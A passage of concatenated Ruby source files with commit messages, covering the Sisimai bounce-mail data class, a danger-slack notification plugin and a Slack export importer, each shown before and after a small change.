o.replycode = '' unless o.replycode[0, 1] == o.deliverystatus[0, 1]
end
end
objectlist << o
end
return objectlist
end
# Convert from object to hash reference
# @return [Hash] Data in Hash reference
def damn
data = {}
@@rwaccessors.each do |e|
next if %w[addresser recipient timestamp].include?(e.to_s)
data[e.to_s] = self.send(e) || ''
end
data['addresser'] = self.addresser.address
data['recipient'] = self.recipient.address
data['timestamp'] = self.timestamp.to_time.to_i
return data
end
alias :to_hash :damn
# Data dumper
# @param [String] type Data format: json, yaml
# @return [String, Nil] Dumped data or nil if the value of the first
# argument is neither "json" nor "yaml"
def dump(type = 'json')
return nil unless %w[json yaml].include?(type)
referclass = 'Sisimai::Data::' << type.upcase
begin
require referclass.downcase.gsub('::', '/')
rescue
warn '***warning: Failed to load' << referclass
end
dumpeddata = Module.const_get(referclass).dump(self)
return dumpeddata
end
# JSON handler
# @return [String] JSON string converted from Sisimai::Data
def to_json(*)
return self.dump('json')
end
end
end
|
module Sisimai
# Sisimai::Data generate parsed data from Sisimai::Message object.
class Data
# Imported from p5-Sisimail/lib/Sisimai/Data.pm
require 'sisimai/address'
require 'sisimai/rfc5322'
require 'sisimai/smtp/reply'
require 'sisimai/smtp/status'
require 'sisimai/string'
require 'sisimai/reason'
require 'sisimai/rhost'
require 'sisimai/time'
require 'sisimai/datetime'
@@rwaccessors = [
:token, # [String] Message token/MD5 Hex digest value
:lhost, # [String] local host name/Local MTA
:rhost, # [String] Remote host name/Remote MTA
:alias, # [String] Alias of the recipient address
:listid, # [String] List-Id header of each ML
:reason, # [String] Bounce reason
:action, # [String] The value of Action: header
:subject, # [String] UTF-8 Subject text
:timestamp, # [Sisimai::Time] Date: header in the original message
:addresser, # [Sisimai::Address] From address
:recipient, # [Sisimai::Address] Recipient address which bounced
:messageid, # [String] Message-Id: header
:replycode, # [String] SMTP Reply Code
:smtpagent, # [String] MTA name
:softbounce, # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
:smtpcommand, # [String] The last SMTP command
:destination, # [String] The domain part of the "recipinet"
:senderdomain, # [String] The domain part of the "addresser"
:feedbacktype, # [String] Feedback Type
:diagnosticcode, # [String] Diagnostic-Code: Header
:diagnostictype, # [String] The 1st part of Diagnostic-Code: Header
:deliverystatus, # [String] Delivery Status(DSN)
:timezoneoffset, # [Integer] Time zone offset(seconds)
]
@@rwaccessors.each { |e| attr_accessor e }
EndOfEmail = Sisimai::String.EOM
RetryIndex = Sisimai::Reason.retry
RFC822Head = Sisimai::RFC5322.HEADERFIELDS('all')
AddrHeader = {
'addresser' => RFC822Head['addresser'],
'recipient' => RFC822Head['recipient'],
}
# Constructor of Sisimai::Data
# @param [Hash] argvs Data
# @return [Sisimai::Data] Structured email data
def initialize(argvs)
thing = {}
# Create email address object
x0 = Sisimai::Address.parse([argvs['addresser']])
y0 = Sisimai::Address.parse([argvs['recipient']])
v0 = nil
if x0.is_a? Array
v0 = Sisimai::Address.new(x0.shift)
if v0.is_a? Sisimai::Address
thing['addresser'] = v0
thing['senderdomain'] = v0.host
end
end
if y0.is_a? Array
v0 = Sisimai::Address.new(y0.shift)
if v0.is_a? Sisimai::Address
thing['recipient'] = v0
thing['destination'] = v0.host
thing['alias'] = argvs['alias'] || ''
end
end
return nil unless thing['recipient'].is_a? Sisimai::Address
return nil unless thing['addresser'].is_a? Sisimai::Address
return nil if thing['recipient'].void
return nil if thing['addresser'].void
@addresser = thing['addresser']
@senderdomain = thing['senderdomain']
@recipient = thing['recipient']
@destination = thing['destination']
@alias = thing['alias']
@token = Sisimai::String.token(@addresser.address, @recipient.address, argvs['timestamp'])
@timestamp = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
@timezoneoffset = argvs['timezoneoffset'] || '+0000'
@lhost = argvs['lhost'] || ''
@rhost = argvs['rhost'] || ''
@reason = argvs['reason'] || ''
@listid = argvs['listid'] || ''
@subject = argvs['subject'] || ''
@messageid = argvs['messageid'] || ''
@smtpagent = argvs['smtpagent'] || ''
@diagnosticcode = argvs['diagnosticcode'] || ''
@diagnostictype = argvs['diagnostictype'] || ''
@deliverystatus = argvs['deliverystatus'] || ''
@smtpcommand = argvs['smtpcommand'] || ''
@feedbacktype = argvs['feedbacktype'] || ''
@action = argvs['action'] || ''
@replycode = Sisimai::SMTP::Reply.find(argvs['diagnosticcode'])
@softbounce = argvs['softbounce'] || ''
@softbounce = 1 if @replycode =~ /\A4/
end
# Another constructor of Sisimai::Data
# @param [Hash] argvs Data and orders
# @option argvs [Sisimai::Message] Data Object
# @return [Array, Undef] List of Sisimai::Data or Undef if the
# argument is not Sisimai::Message object
def self.make(data: nil, **argvs)
return nil unless data
return nil unless data.is_a? Sisimai::Message
messageobj = data
rfc822data = messageobj.rfc822
fieldorder = { 'recipient' => [], 'addresser' => [] }
objectlist = []
rxcommands = %r/\A(?:EHLO|HELO|MAIL|RCPT|DATA|QUIT)\z/
givenorder = argvs['order'] || {}
return nil unless messageobj.ds
return nil unless messageobj.rfc822
require 'sisimai/smtp'
# Decide the order of email headers: user specified or system default.
if givenorder.is_a?(Hash) && givenorder.keys.size > 0
# If the order of headers for searching is specified, use the order
# for detecting an email address.
fieldorder.each_key do |e|
# The order should be "Array Reference".
next unless givenorder[e]
next unless givenorder[e].is_a? Array
next unless givenorder[e].size > 0
fieldorder[e].concat(givenorder[e])
end
end
fieldorder.each_key do |e|
# If the order is empty, use default order.
if fieldorder[e].empty?
# Load default order of each accessor.
fieldorder[e] = AddrHeader[e]
end
end
messageobj.ds.each do |e|
# Create parameters for new() constructor.
o = nil # Sisimai::Data Object
r = nil # Reason text
p = {
'lhost' => e['lhost'] || '',
'rhost' => e['rhost'] || '',
'alias' => e['alias'] || '',
'action' => e['action'] || '',
'reason' => e['reason'] || '',
'smtpagent' => e['agent'] || '',
'recipient' => e['recipient'] || '',
'softbounce' => e['softbounce'] || '',
'smtpcommand' => e['command'] || '',
'feedbacktype' => e['feedbacktype'] || '',
'diagnosticcode' => e['diagnosis'] || '',
'diagnostictype' => e['spec'] || '',
'deliverystatus' => e['status'] || '',
}
next if p['deliverystatus'] =~ /\A2[.]/
# EMAIL_ADDRESS:
# Detect email address from message/rfc822 part
fieldorder['addresser'].each do |f|
# Check each header in message/rfc822 part
h = f.downcase
next unless rfc822data.key?(h)
next unless rfc822data[h].size > 0
next unless Sisimai::RFC5322.is_emailaddress(rfc822data[h])
p['addresser'] = rfc822data[h]
break
end
# Fallback: Get the sender address from the header of the bounced
# email if the address is not set at loop above.
p['addresser'] ||= ''
p['addresser'] = messageobj.header['to'] if p['addresser'].empty?
if p['alias'] && Sisimai::RFC5322.is_emailaddress(p['alias'])
# Alias address should be the value of "recipient", Replace the
# value of recipient with the value of "alias".
w = p['recipient']
p['recipient'] = p['alias']
p['alias'] = w
end
next unless p['addresser']
next unless p['recipient']
# TIMESTAMP:
# Convert from a time stamp or a date string to a machine time.
datestring = nil
zoneoffset = 0
datevalues = []
if e['date'] && e['date'].size > 0
datevalues << e['date']
end
# Date information did not exist in message/delivery-status part,...
RFC822Head['date'].each do |f|
# Get the value of Date header or other date related header.
next unless rfc822data[f.downcase]
datevalues << rfc822data[f.downcase]
end
if datevalues.size < 2
# Set "date" getting from the value of "Date" in the bounce message
datevalues << messageobj.header['date']
end
datevalues.each do |v|
# Parse each date value in the array
datestring = Sisimai::DateTime.parse(v)
break if datestring
end
if datestring
# Get the value of timezone offset from $datestring
if cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
# Wed, 26 Feb 2014 06:05:48 -0500
datestring = cv[1]
zoneoffset = Sisimai::DateTime.tz2second(cv[2])
p['timezoneoffset'] = cv[2]
end
end
begin
# Convert from the date string to an object then calculate time
# zone offset.
t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
rescue
warn ' ***warning: Failed to strptime ' + datestring.to_s
end
next unless p['timestamp']
# OTHER_TEXT_HEADERS:
# Remove square brackets and curly brackets from the host variable
%w|rhost lhost|.each do |v|
p[v] = p[v].delete('[]()') # Remove square brackets and curly brackets from the host variable
p[v] = p[v].sub(/\A.+=/, '') # Remove string before "="
p[v] = p[v].gsub(/\r\z/, '') # Remove CR at the end of the value
# Check space character in each value
if p[v] =~ / /
# Get the first element
p[v] = p[v].split(' ', 2).shift
end
end
# Subject: header of the original message
p['subject'] = rfc822data['subject'] || ''
p['subject'] = p['subject'].gsub(/\r\z/, '')
# The value of "List-Id" header
p['listid'] = rfc822data['list-id'] || ''
if p['listid'].size > 0
# Get the value of List-Id header
if cv = p['listid'].match(/\A.*([<].+[>]).*\z/)
# List name <list-id@example.org>
p['listid'] = cv[1]
end
p['listid'] = p['listid'].delete('<>')
p['listid'] = p['listid'].gsub(/\r\z/, '')
p['listid'] = '' if p['listid'] =~ / /
end
# The value of "Message-Id" header
p['messageid'] = rfc822data['message-id'] || ''
if p['messageid'].size > 0
# Remove angle brackets
if cv = p['messageid'].match(/\A([^ ]+)[ ].*/)
p['messageid'] = cv[1]
end
p['messageid'] = p['messageid'].delete('<>')
p['messageid'] = p['messageid'].gsub(/\r\z/, '')
end
# CHECK_DELIVERY_STATUS_VALUE:
# Cleanup the value of "Diagnostic-Code:" header
p['diagnosticcode'] = p['diagnosticcode'].sub(/[ \t]+#{EndOfEmail}/, '')
d = Sisimai::SMTP::Status.find(p['diagnosticcode'])
if d =~ /\A[45][.][1-9][.][1-9]\z/
# Use the DSN value in Diagnostic-Code:
p['deliverystatus'] = d
end
# Check the value of SMTP command
p['smtpcommand'] = '' unless p['smtpcommand'] =~ rxcommands
o = Sisimai::Data.new(p)
next unless o.recipient
if o.reason.empty? || RetryIndex.index(o.reason)
# Decide the reason of email bounce
r = ''
if Sisimai::Rhost.match(o.rhost)
# Remote host dependent error
r = Sisimai::Rhost.get(o)
end
r = Sisimai::Reason.get(o) if r.empty?
r = 'undefined' if r.empty?
o.reason = r
end
if o.reason != 'feedback' && o.reason != 'vacation'
# Bounce message which reason is "feedback" or "vacation" does
# not have the value of "deliverystatus".
if o.softbounce.to_s.empty?
# The value is not set yet
%w|deliverystatus diagnosticcode|.each do |v|
# Set the value of softbounce
next unless p[v].size > 0
r = Sisimai::SMTP.is_softbounce(p[v])
if r.nil?
o.softbounce = -1
else
o.softbounce = r ? 1 : 0
end
break if o.softbounce > -1
end
o.softbounce = -1 if o.softbounce.to_s.empty?
end
if o.deliverystatus.empty?
# Set pseudo status code
torp = o.softbounce == 1 ? true : false
pdsv = Sisimai::SMTP::Status.code(o.reason, torp)
if pdsv.size > 0
# Set the value of "deliverystatus" and "softbounce".
o.deliverystatus = pdsv
if o.softbounce == -1
# Check the value of "softbounce" again
torp = Sisimai::SMTP.is_softbounce(pdsv)
if torp.nil?
o.softbounce = -1
else
o.softbounce = torp ? 1 : 0
end
end
end
end
else
# The value of reason is "vacation" or "feedback"
o.softbounce = -1
end
objectlist << o
end
return objectlist
end
# Convert from object to hash reference
# @return [Hash] Data in Hash reference
def damn
data = nil
begin
v = {}
stringdata = %w[
token lhost rhost listid alias reason subject messageid smtpagent
smtpcommand destination diagnosticcode senderdomain deliverystatus
timezoneoffset feedbacktype diagnostictype action replycode softbounce
]
stringdata.each do |e|
# Copy string data
v[e] = self.send(e) || ''
end
v['addresser'] = self.addresser.address
v['recipient'] = self.recipient.address
v['timestamp'] = self.timestamp.to_time.to_i
data = v
rescue
warn '***warning: Failed to damn()'
end
return data
end
# Data dumper
# @param [String] type Data format: json, yaml
# @return [String, Undef] Dumped data or Undef if the value of first
# argument is neither "json" nor "yaml"
def dump(type = 'json')
return nil unless %w|json yaml|.index(type)
referclass = sprintf('Sisimai::Data::%s', type.upcase)
begin
require referclass.downcase.gsub('::', '/')
rescue
warn '***warning: Failed to load' + referclass
end
dumpeddata = Module.const_get(referclass).dump(self)
return dumpeddata
end
def to_hash
data = {}
@@rwaccessors.each do |e|
next if e.to_s =~ /\A(?:addresser|recipient|timestamp)\z/
data[e.to_s] = self.send(e)
end
data['addresser'] = self.addresser.to_s
data['recipient'] = self.recipient.to_s
data['timestamp'] = self.timestamp.to_time.to_i
return data
end
end
end
Improved Sisimai::Data#damn, set alias to "damn" as "to_hash", issue #42
module Sisimai
# Sisimai::Data generate parsed data from Sisimai::Message object.
class Data
# Imported from p5-Sisimail/lib/Sisimai/Data.pm
require 'sisimai/address'
require 'sisimai/rfc5322'
require 'sisimai/smtp/reply'
require 'sisimai/smtp/status'
require 'sisimai/string'
require 'sisimai/reason'
require 'sisimai/rhost'
require 'sisimai/time'
require 'sisimai/datetime'
@@rwaccessors = [
:token, # [String] Message token/MD5 Hex digest value
:lhost, # [String] local host name/Local MTA
:rhost, # [String] Remote host name/Remote MTA
:alias, # [String] Alias of the recipient address
:listid, # [String] List-Id header of each ML
:reason, # [String] Bounce reason
:action, # [String] The value of Action: header
:subject, # [String] UTF-8 Subject text
:timestamp, # [Sisimai::Time] Date: header in the original message
:addresser, # [Sisimai::Address] From address
:recipient, # [Sisimai::Address] Recipient address which bounced
:messageid, # [String] Message-Id: header
:replycode, # [String] SMTP Reply Code
:smtpagent, # [String] MTA name
:softbounce, # [Integer] 1 = Soft bounce, 0 = Hard bounce, -1 = ?
:smtpcommand, # [String] The last SMTP command
:destination, # [String] The domain part of the "recipinet"
:senderdomain, # [String] The domain part of the "addresser"
:feedbacktype, # [String] Feedback Type
:diagnosticcode, # [String] Diagnostic-Code: Header
:diagnostictype, # [String] The 1st part of Diagnostic-Code: Header
:deliverystatus, # [String] Delivery Status(DSN)
:timezoneoffset, # [Integer] Time zone offset(seconds)
]
@@rwaccessors.each { |e| attr_accessor e }
EndOfEmail = Sisimai::String.EOM
RetryIndex = Sisimai::Reason.retry
RFC822Head = Sisimai::RFC5322.HEADERFIELDS('all')
AddrHeader = {
'addresser' => RFC822Head['addresser'],
'recipient' => RFC822Head['recipient'],
}
# Constructor of Sisimai::Data
# @param [Hash] argvs Data
# @return [Sisimai::Data] Structured email data
def initialize(argvs)
thing = {}
# Create email address object
x0 = Sisimai::Address.parse([argvs['addresser']])
y0 = Sisimai::Address.parse([argvs['recipient']])
v0 = nil
if x0.is_a? Array
v0 = Sisimai::Address.new(x0.shift)
if v0.is_a? Sisimai::Address
thing['addresser'] = v0
thing['senderdomain'] = v0.host
end
end
if y0.is_a? Array
v0 = Sisimai::Address.new(y0.shift)
if v0.is_a? Sisimai::Address
thing['recipient'] = v0
thing['destination'] = v0.host
thing['alias'] = argvs['alias'] || ''
end
end
return nil unless thing['recipient'].is_a? Sisimai::Address
return nil unless thing['addresser'].is_a? Sisimai::Address
return nil if thing['recipient'].void
return nil if thing['addresser'].void
@addresser = thing['addresser']
@senderdomain = thing['senderdomain']
@recipient = thing['recipient']
@destination = thing['destination']
@alias = thing['alias']
@token = Sisimai::String.token(@addresser.address, @recipient.address, argvs['timestamp'])
@timestamp = Sisimai::Time.parse(::Time.at(argvs['timestamp']).to_s)
@timezoneoffset = argvs['timezoneoffset'] || '+0000'
@lhost = argvs['lhost'] || ''
@rhost = argvs['rhost'] || ''
@reason = argvs['reason'] || ''
@listid = argvs['listid'] || ''
@subject = argvs['subject'] || ''
@messageid = argvs['messageid'] || ''
@smtpagent = argvs['smtpagent'] || ''
@diagnosticcode = argvs['diagnosticcode'] || ''
@diagnostictype = argvs['diagnostictype'] || ''
@deliverystatus = argvs['deliverystatus'] || ''
@smtpcommand = argvs['smtpcommand'] || ''
@feedbacktype = argvs['feedbacktype'] || ''
@action = argvs['action'] || ''
@replycode = Sisimai::SMTP::Reply.find(argvs['diagnosticcode'])
@softbounce = argvs['softbounce'] || ''
@softbounce = 1 if @replycode =~ /\A4/
end
# Another constructor of Sisimai::Data
# @param [Hash] argvs Data and orders
# @option argvs [Sisimai::Message] Data Object
# @return [Array, Undef] List of Sisimai::Data or Undef if the
# argument is not Sisimai::Message object
def self.make(data: nil, **argvs)
return nil unless data
return nil unless data.is_a? Sisimai::Message
messageobj = data
rfc822data = messageobj.rfc822
fieldorder = { 'recipient' => [], 'addresser' => [] }
objectlist = []
rxcommands = %r/\A(?:EHLO|HELO|MAIL|RCPT|DATA|QUIT)\z/
givenorder = argvs['order'] || {}
return nil unless messageobj.ds
return nil unless messageobj.rfc822
require 'sisimai/smtp'
# Decide the order of email headers: user specified or system default.
if givenorder.is_a?(Hash) && givenorder.keys.size > 0
# If the order of headers for searching is specified, use the order
# for detecting an email address.
fieldorder.each_key do |e|
# The order should be "Array Reference".
next unless givenorder[e]
next unless givenorder[e].is_a? Array
next unless givenorder[e].size > 0
fieldorder[e].concat(givenorder[e])
end
end
fieldorder.each_key do |e|
# If the order is empty, use default order.
if fieldorder[e].empty?
# Load default order of each accessor.
fieldorder[e] = AddrHeader[e]
end
end
messageobj.ds.each do |e|
# Create parameters for new() constructor.
o = nil # Sisimai::Data Object
r = nil # Reason text
p = {
'lhost' => e['lhost'] || '',
'rhost' => e['rhost'] || '',
'alias' => e['alias'] || '',
'action' => e['action'] || '',
'reason' => e['reason'] || '',
'smtpagent' => e['agent'] || '',
'recipient' => e['recipient'] || '',
'softbounce' => e['softbounce'] || '',
'smtpcommand' => e['command'] || '',
'feedbacktype' => e['feedbacktype'] || '',
'diagnosticcode' => e['diagnosis'] || '',
'diagnostictype' => e['spec'] || '',
'deliverystatus' => e['status'] || '',
}
next if p['deliverystatus'] =~ /\A2[.]/
# EMAIL_ADDRESS:
# Detect email address from message/rfc822 part
fieldorder['addresser'].each do |f|
# Check each header in message/rfc822 part
h = f.downcase
next unless rfc822data.key?(h)
next unless rfc822data[h].size > 0
next unless Sisimai::RFC5322.is_emailaddress(rfc822data[h])
p['addresser'] = rfc822data[h]
break
end
# Fallback: Get the sender address from the header of the bounced
# email if the address is not set at loop above.
p['addresser'] ||= ''
p['addresser'] = messageobj.header['to'] if p['addresser'].empty?
if p['alias'] && Sisimai::RFC5322.is_emailaddress(p['alias'])
# Alias address should be the value of "recipient", Replace the
# value of recipient with the value of "alias".
w = p['recipient']
p['recipient'] = p['alias']
p['alias'] = w
end
next unless p['addresser']
next unless p['recipient']
# TIMESTAMP:
# Convert from a time stamp or a date string to a machine time.
datestring = nil
zoneoffset = 0
datevalues = []
if e['date'] && e['date'].size > 0
datevalues << e['date']
end
# Date information did not exist in message/delivery-status part,...
RFC822Head['date'].each do |f|
# Get the value of Date header or other date related header.
next unless rfc822data[f.downcase]
datevalues << rfc822data[f.downcase]
end
if datevalues.size < 2
# Set "date" getting from the value of "Date" in the bounce message
datevalues << messageobj.header['date']
end
datevalues.each do |v|
# Parse each date value in the array
datestring = Sisimai::DateTime.parse(v)
break if datestring
end
if datestring
# Get the value of timezone offset from $datestring
if cv = datestring.match(/\A(.+)[ ]+([-+]\d{4})\z/)
# Wed, 26 Feb 2014 06:05:48 -0500
datestring = cv[1]
zoneoffset = Sisimai::DateTime.tz2second(cv[2])
p['timezoneoffset'] = cv[2]
end
end
begin
# Convert from the date string to an object then calculate time
# zone offset.
t = Sisimai::Time.strptime(datestring, '%a, %d %b %Y %T')
p['timestamp'] = (t.to_time.to_i - zoneoffset) || nil
rescue
warn ' ***warning: Failed to strptime ' + datestring.to_s
end
next unless p['timestamp']
# OTHER_TEXT_HEADERS:
# Remove square brackets and curly brackets from the host variable
%w|rhost lhost|.each do |v|
p[v] = p[v].delete('[]()') # Remove square brackets and curly brackets from the host variable
p[v] = p[v].sub(/\A.+=/, '') # Remove string before "="
p[v] = p[v].gsub(/\r\z/, '') # Remove CR at the end of the value
# Check space character in each value
if p[v] =~ / /
# Get the first element
p[v] = p[v].split(' ', 2).shift
end
end
# Subject: header of the original message
p['subject'] = rfc822data['subject'] || ''
p['subject'] = p['subject'].gsub(/\r\z/, '')
# The value of "List-Id" header
p['listid'] = rfc822data['list-id'] || ''
if p['listid'].size > 0
# Get the value of List-Id header
if cv = p['listid'].match(/\A.*([<].+[>]).*\z/)
# List name <list-id@example.org>
p['listid'] = cv[1]
end
p['listid'] = p['listid'].delete('<>')
p['listid'] = p['listid'].gsub(/\r\z/, '')
p['listid'] = '' if p['listid'] =~ / /
end
# The value of "Message-Id" header
p['messageid'] = rfc822data['message-id'] || ''
if p['messageid'].size > 0
# Remove angle brackets
if cv = p['messageid'].match(/\A([^ ]+)[ ].*/)
p['messageid'] = cv[1]
end
p['messageid'] = p['messageid'].delete('<>')
p['messageid'] = p['messageid'].gsub(/\r\z/, '')
end
# CHECK_DELIVERY_STATUS_VALUE:
# Cleanup the value of "Diagnostic-Code:" header
p['diagnosticcode'] = p['diagnosticcode'].sub(/[ \t]+#{EndOfEmail}/, '')
d = Sisimai::SMTP::Status.find(p['diagnosticcode'])
if d =~ /\A[45][.][1-9][.][1-9]\z/
# Use the DSN value in Diagnostic-Code:
p['deliverystatus'] = d
end
# Check the value of SMTP command
p['smtpcommand'] = '' unless p['smtpcommand'] =~ rxcommands
o = Sisimai::Data.new(p)
next unless o.recipient
if o.reason.empty? || RetryIndex.index(o.reason)
# Decide the reason of email bounce
r = ''
if Sisimai::Rhost.match(o.rhost)
# Remote host dependent error
r = Sisimai::Rhost.get(o)
end
r = Sisimai::Reason.get(o) if r.empty?
r = 'undefined' if r.empty?
o.reason = r
end
if o.reason != 'feedback' && o.reason != 'vacation'
# Bounce message which reason is "feedback" or "vacation" does
# not have the value of "deliverystatus".
if o.softbounce.to_s.empty?
# The value is not set yet
%w|deliverystatus diagnosticcode|.each do |v|
# Set the value of softbounce
next unless p[v].size > 0
r = Sisimai::SMTP.is_softbounce(p[v])
if r.nil?
o.softbounce = -1
else
o.softbounce = r ? 1 : 0
end
break if o.softbounce > -1
end
o.softbounce = -1 if o.softbounce.to_s.empty?
end
if o.deliverystatus.empty?
# Set pseudo status code
torp = o.softbounce == 1 ? true : false
pdsv = Sisimai::SMTP::Status.code(o.reason, torp)
if pdsv.size > 0
# Set the value of "deliverystatus" and "softbounce".
o.deliverystatus = pdsv
if o.softbounce == -1
# Check the value of "softbounce" again
torp = Sisimai::SMTP.is_softbounce(pdsv)
if torp.nil?
o.softbounce = -1
else
o.softbounce = torp ? 1 : 0
end
end
end
end
else
# The value of reason is "vacation" or "feedback"
o.softbounce = -1
end
objectlist << o
end
return objectlist
end
# Convert from object to hash reference
# @return [Hash] Data in Hash reference
def damn
data = {}
@@rwaccessors.each do |e|
next if e.to_s =~ /(?:addresser|recipient|timestamp)/
data[e.to_s] = self.send(e) || ''
end
data['addresser'] = self.addresser.address
data['recipient'] = self.recipient.address
data['timestamp'] = self.timestamp.to_time.to_i
return data
end
alias :to_hash :damn
# Data dumper
# @param [String] type Data format: json, yaml
# @return [String, Undef] Dumped data or Undef if the value of first
# argument is neither "json" nor "yaml"
def dump(type = 'json')
return nil unless %w|json yaml|.index(type)
referclass = sprintf('Sisimai::Data::%s', type.upcase)
begin
require referclass.downcase.gsub('::', '/')
rescue
warn '***warning: Failed to load' + referclass
end
dumpeddata = Module.const_get(referclass).dump(self)
return dumpeddata
end
# JSON handler
# @return [String] JSON string converted from Sisimai::Data
def to_json(*)
return self.dump('json')
end
end
end
|
module Danger
# Notify danger reports to slack.
#
# The following steps is required for using danger-slack plugin.
# 1. create bot in https://my.slack.com/services/new/bot
# 2. invite created bot user to channel in slack app
#
# The bot's token is starting from `xoxb-`
#
# @example Configure credentials to access the Slack API
# slack.api_token = YOUR_API_TOKEN
#
# @example Get channels
# message slack.channels.map {|channel| channel['name']}.join "\n"
#
# @example Get members
# message slack.members.map {|member| member['name'] }.join "\n"
#
# @example Notify danger reports to slack
# slack.notify(channel: '#your_channel')
#
# @example Post message to slack
# slack.notify(channel: '#your_channel', text: 'hello danger')
#
# @see duck8823/danger-slack
# @tags slack
#
class DangerSlack < Plugin
# API token to authenticate with SLACK API
#
# @return [String]
attr_accessor :api_token
def initialize(dangerfile)
super(dangerfile)
@api_token = ENV['SLACK_API_TOKEN']
@conn = Faraday.new(url: 'https://slack.com/api')
end
# get slack team members
# For more information, see also https://api.slack.com/methods/users.list
#
# @return [[Hash]]
def members
res = @conn.get 'users.list', token: @api_token
Array(JSON.parse(res.body)['members'])
end
# get slack team channels
# For more information, see also https://api.slack.com/methods/channels.list
#
# @return [[Hash]]
def channels
res = @conn.get 'channels.list', token: @api_token
Array(JSON.parse(res.body)['channels'])
end
# get slack team groups (private channels)
# For more information, see also http://api.slack.com/methods/groups.list
#
# @return [[Hash]]
def groups
res = @conn.get 'groups.list', token: @api_token
Array(JSON.parse(res.body)['groups'])
end
# notify to Slack
#
# @param [String] channel
# It is channel to be notified, defaults to '#general'
# @param [String] text
# text message posted to slack, defaults to nil.
# if nil, this method post danger reports to slack.
# @return [void]
def notify(channel: '#general', text: nil, **opts)
attachments = text.nil? ? report : []
text ||= '<http://danger.systems/|Danger> reports'
@conn.post do |req|
req.url 'chat.postMessage'
req.params = {
token: @api_token,
channel: channel,
text: text,
attachments: attachments.to_json,
link_names: 1,
**opts
}
end
end
private
# get status_report text
# @return [[Hash]]
def report
attachment = status_report
.reject { |_, v| v.empty? }
.map do |k, v|
case k.to_s
when 'errors' then
{
text: v.join("\n"),
color: 'danger'
}
when 'warnings' then
{
text: v.join("\n"),
color: 'warning'
}
when 'messages' then
{
text: v.join("\n"),
color: 'good'
}
when 'markdowns' then
v.map do |val|
{
text: val.message,
fields: fields(val)
}
end
end
end
attachment.flatten
end
# get markdown fields
# @return [[Hash]]
def fields(markdown)
fields = []
if markdown.file
fields.push(title: 'file',
value: markdown.file,
short: true)
end
if markdown.line
fields.push(title: 'line',
value: markdown.line,
short: true)
end
fields
end
end
end
Add param
module Danger
# Notify danger reports to slack.
#
# The following steps is required for using danger-slack plugin.
# 1. create bot in https://my.slack.com/services/new/bot
# 2. invite created bot user to channel in slack app
#
# The bot's token is starting from `xoxb-`
#
# @example Configure credentials to access the Slack API
# slack.api_token = YOUR_API_TOKEN
#
# @example Get channels
# message slack.channels.map {|channel| channel['name']}.join "\n"
#
# @example Get members
# message slack.members.map {|member| member['name'] }.join "\n"
#
# @example Notify danger reports to slack
# slack.notify(channel: '#your_channel')
#
# @example Post message to slack
# slack.notify(channel: '#your_channel', text: 'hello danger')
#
# @see duck8823/danger-slack
# @tags slack
#
class DangerSlack < Plugin
# API token to authenticate with SLACK API
#
# @return [String]
attr_accessor :api_token
def initialize(dangerfile)
super(dangerfile)
@api_token = ENV['SLACK_API_TOKEN']
@conn = Faraday.new(url: 'https://slack.com/api')
end
# get slack team members
# For more information, see also https://api.slack.com/methods/users.list
#
# @return [[Hash]]
def members
res = @conn.get 'users.list', token: @api_token
Array(JSON.parse(res.body)['members'])
end
# get slack team channels
# For more information, see also https://api.slack.com/methods/channels.list
#
# @return [[Hash]]
def channels
res = @conn.get 'channels.list', token: @api_token
Array(JSON.parse(res.body)['channels'])
end
# get slack team groups (private channels)
# For more information, see also http://api.slack.com/methods/groups.list
#
# @return [[Hash]]
def groups
res = @conn.get 'groups.list', token: @api_token
Array(JSON.parse(res.body)['groups'])
end
# notify to Slack
#
# @param [String] channel
# It is channel to be notified, defaults to '#general'
# @param [String] text
# text message posted to slack, defaults to nil.
# if nil, this method post danger reports to slack.
# @param [Hash] **opts
# @return [void]
def notify(channel: '#general', text: nil, **opts)
attachments = text.nil? ? report : []
text ||= '<http://danger.systems/|Danger> reports'
@conn.post do |req|
req.url 'chat.postMessage'
req.params = {
token: @api_token,
channel: channel,
text: text,
attachments: attachments.to_json,
link_names: 1,
**opts
}
end
end
private
# get status_report text
# @return [[Hash]]
def report
attachment = status_report
.reject { |_, v| v.empty? }
.map do |k, v|
case k.to_s
when 'errors' then
{
text: v.join("\n"),
color: 'danger'
}
when 'warnings' then
{
text: v.join("\n"),
color: 'warning'
}
when 'messages' then
{
text: v.join("\n"),
color: 'good'
}
when 'markdowns' then
v.map do |val|
{
text: val.message,
fields: fields(val)
}
end
end
end
attachment.flatten
end
# get markdown fields
# @return [[Hash]]
def fields(markdown)
fields = []
if markdown.file
fields.push(title: 'file',
value: markdown.file,
short: true)
end
if markdown.line
fields.push(title: 'line',
value: markdown.line,
short: true)
end
fields
end
end
end
|
require 'json'
require 'zip'
require 'fileutils'
require 'tmpdir'
require './lib/db'
class SlackImport
def import_messages(channel, messages)
messages.each do |m|
m['channel'] = channel[:id]
insert_message(m)
end
end
def import_channels(channels)
replace_channels(channels)
end
def import_users(users)
replace_users(users)
end
# format of exported file
#
# exported.zip
#
# - channels.json
# - users.json
# - channel/
# - 2015-01-01.json
def import_from_file(exported_file)
dist = Dir.mktmpdir
begin
Zip::File.open(exported_file) do |zip|
zip.each do |entry|
entry.extract(dist + '/' + entry.to_s)
end
open(dist + '/channels.json') do |io|
import_channels(JSON.load(io))
end
open(dist + '/users.json') do |io|
import_users(JSON.load(io))
end
zip.each do |entry|
# channel/2015-01-01.json
if !File.directory?(dist + '/' + entry.to_s) and entry.to_s.split('/').size > 1
puts "import #{entry.to_s}"
channel = Channels.find(name: entry.to_s.split('/')[0]).to_a[0]
messages = JSON.load(entry.get_input_stream)
import_messages(channel, messages)
end
end
end
ensure
FileUtils.rm_r(dist)
end
end
end
Fix error when importing unicode channel names
require 'json'
require 'zip'
require 'fileutils'
require 'tmpdir'
require './lib/db'
class SlackImport
def import_messages(channel, messages)
messages.each do |m|
m['channel'] = channel[:id]
insert_message(m)
end
end
def import_channels(channels)
replace_channels(channels)
end
def import_users(users)
replace_users(users)
end
# format of exported file
#
# exported.zip
#
# - channels.json
# - users.json
# - channel/
# - 2015-01-01.json
def import_from_file(exported_file)
dist = Dir.mktmpdir
begin
Zip::File.open(exported_file) do |zip|
zip.each do |entry|
entry.extract(dist + '/' + entry.to_s)
end
open(dist + '/channels.json') do |io|
import_channels(JSON.load(io))
end
open(dist + '/users.json') do |io|
